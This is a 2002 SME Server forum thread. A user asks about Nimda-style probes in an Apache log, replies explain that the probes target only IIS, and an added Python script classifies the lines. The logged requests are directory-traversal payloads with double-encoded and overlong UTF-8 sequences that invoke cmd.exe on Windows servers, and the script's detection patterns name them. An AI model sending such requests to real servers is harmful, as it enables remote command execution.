Koozali.org: home of the SME Server

Legacy Forums => General Discussion (Legacy) => Topic started by: Christian on June 28, 2002, 02:57:16 PM

Title: NIMBA
Post by: Christian on June 28, 2002, 02:57:16 PM
I just downloaded SME server from a NL ftp mirror.
6 hours after installation this code was found in the HTTP log
Is it a Virus "Nimba" ????
If yes, How can it be in SME server so fast????????????????
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
"GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
"GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
"GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
"GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"

Christian. Denmark
Title: Re: NIMBA
Post by: Jon Blakely on June 28, 2002, 04:12:40 PM
Christian,

Yes that is NIMDA but it is nothing to worry about, apart from wasting a bit of bandwidth it is harmless. It only affects M$ IIS web servers.
It is not in your server but is infected M$ servers trying to give it to you.
You will probably get another one that is a string of NNNNNNN's. That is Code Red or Code Red II. It is also harmless.

Jon
Title: Re: NIMBA
Post by: Holger on June 28, 2002, 04:15:02 PM
Hej Christian

I think everybody gets those if you're connected to the internet!

It is showing that somebody or something (script kiddies or a virus) is attempting to exploit some security vulnerabilities. Only they are _very_ stupid, since they have not detected that your box is not a windoze box.

Don't worry - it's not harmful to you except for your lost bandwidth and cpu cycles.

There's nothing you can do about it either :(
It's just the common general pollution of the internet.

Holger
Title: Re: NIMBA
Post by: Johan on June 29, 2002, 03:19:31 PM
It's not nimda,

it's someone who scans your server for security flaws..
in this case he's scanning for the unicode-bug...
but you don't have to worry,.. you don't have NT/IIS :)

greetzz
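
Added example, not part of any post in this thread: a small Python triage script for log lines like the ones quoted in the first post. It decodes each request path repeatedly, tags the encoded-traversal and cmd.exe/root.exe requests, and reports whether the server answered any of them with something other than an error. The function names, the tag names and the last sample line are assumptions made for this example; the other sample lines are copied from the excerpt above.

```python
import re
from urllib.parse import unquote_to_bytes

# Request and status as they appear in the log excerpt quoted in this thread.
LINE_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/\d\.\d" (\d{3}) \d+')

# Sample input: five lines from the excerpt above plus one constructed benign request.
SAMPLE = [
    '"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"',
    '"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"',
    '"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"',
    '"GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"',
    '"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"',
    '"GET /index.html HTTP/1.0" 200 1043 "-" "-"',
]

def decode_fully(target, max_rounds=4):
    """Percent-decode until stable; return (bytes, number of rounds that changed it)."""
    raw, rounds = target.encode("utf-8"), 0
    for _ in range(max_rounds):
        nxt = unquote_to_bytes(raw)
        if nxt == raw:
            break
        raw, rounds = nxt, rounds + 1
    return raw, rounds

def classify(line):
    """Return tags, status and a 'served' flag for one line, or None if it does not parse."""
    m = LINE_RE.search(line)
    if not m:
        return None
    path = m.group(1).split("?", 1)[0]
    raw, rounds = decode_fully(path)
    tags = set()
    if rounds > 1:                          # e.g. %255c -> %5c -> backslash
        tags.add("double-encoded")
    if b"\xc0" in raw or b"\xc1" in raw:    # 0xC0/0xC1 never occur in valid UTF-8
        tags.add("overlong-utf8")
    if re.search(rb"\.\.[\\/\xc0\xc1]", raw):
        tags.add("traversal")
    if re.search(rb"/(cmd|root)\.exe$", raw.lower()):
        tags.add("windows-shell")
    status = int(m.group(2))
    return {"tags": tags, "status": status, "served": bool(tags) and status < 400}

def summarize(lines):
    """Count tagged lines and collect any that the server did not reject."""
    results = [r for r in map(classify, lines) if r and r["tags"]]
    return {"probes": len(results), "served": [r for r in results if r["served"]]}
```

On the sample, `summarize(SAMPLE)` counts five tagged requests and an empty `served` list, which matches the 404 and 400 responses in the original log.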
Title: Re: NIMBA --THANKS ALL
Post by: Christian on June 29, 2002, 11:12:17 PM
Thanks all
I'm new to these servers, have only been working with windows 2000 adv srv.
So thanks again....

Christian.....
one never gets too old to learn something new